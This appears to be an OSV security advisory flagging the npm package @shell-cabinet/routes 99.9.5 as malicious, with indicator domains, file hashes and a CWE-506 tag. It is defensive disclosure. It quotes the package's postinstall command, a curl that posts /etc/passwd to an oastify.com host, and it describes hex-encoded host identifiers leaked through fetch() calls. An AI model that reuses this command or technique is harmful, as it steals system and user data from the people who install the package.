MAL-2026-5428

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@shell-cabinet/routes/MAL-2026-5428.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5428
Published
2026-06-09T17:18:53Z
Modified
2026-06-09T18:01:32.755041188Z
Summary
Malicious code in @shell-cabinet/routes (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (b385f020626d8bad774fe5ebd776683b547bea4edef85944af658fd0155924ad)

On npm install, the package's postinstall hook runs curl --data '@/etc/passwd' $(hostname).200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com, posting the installer's /etc/passwd to a hostname-prefixed subdomain of oastify.com (a Burp Collaborator out-of-band channel). The same postinstall first executes scripts/scream3gg.js, which hex-encodes os.hostname(), os.homedir(), and os.userInfo().username and issues plain-HTTP fetch() requests with the hex chunked into subdomains of nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com, leaking host identifiers over DNS-encoded HTTP. Both behaviors fire unconditionally at install time and have no relationship to any documented package functionality.

Database specific
{
    "malicious-packages-origins": [
        {
            "modified_time": "2026-06-09T17:18:53Z",
            "versions": [
                "99.9.5"
            ],
            "sha256": "b385f020626d8bad774fe5ebd776683b547bea4edef85944af658fd0155924ad",
            "id": "IN-MAL-2026-005023",
            "source": "amazon-inspector",
            "import_time": "2026-06-09T17:45:49.612418024Z"
        },
        {
            "modified_time": "2026-06-09T17:18:53Z",
            "versions": [
                "99.9.5"
            ],
            "sha256": "d8dcb342941bc75e4b1f4ff0b757d193f681b483a32295dc331468cd2dc1e616",
            "id": "IN-MAL-2026-005024",
            "source": "amazon-inspector",
            "import_time": "2026-06-09T17:45:49.659171381Z"
        }
    ]
}

Affected packages

npm / @shell-cabinet/routes

Package

Name
@shell-cabinet/routes
Purl
pkg:npm/%40shell-cabinet%2Froutes

Affected versions

99.*
99.9.5

Database specific

indicators
{
    "domains": [
        "7363616e2d636130376335616366366233.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com",
        "2f686f6d652f7363616e.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com",
        "7363616e.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com"
    ],
    "evidence_files": [
        {
            "sha256": "eda57c69d61e98fd57162568b1c0fc5efab6667660c7bfdc911dc86ee46320f6",
            "tlsh": "86d0a7b07800c673bedd06a34128a1817955c85f2214b96256df86e4a114761a4e6516",
            "path": "package.json"
        },
        {
            "sha256": "9b962b07165e35cb12a1424434b1d1be779ead9b43df94af8baf0e5a1b66a6c9",
            "tlsh": "74f08ba955b11938382b50819dafd40db1e7fa0630a6e4f2fedd86810f44865bd22dde",
            "path": "scripts/scream3gg.js"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-qdRAUXJb4ZV0GlLaKvsCgB55xamZ5c+i4+RFoJ9OyR72irI38mXq1ICIk3ZL64FQyu75UUINdY6t2x6InaA1mg==",
                "sha1": "6bfb1133e5f75d2e5507150c837267fd322a4a26"
            },
            "filename": "routes-99.9.5.tgz"
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@shell-cabinet/routes/MAL-2026-5428.json"
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]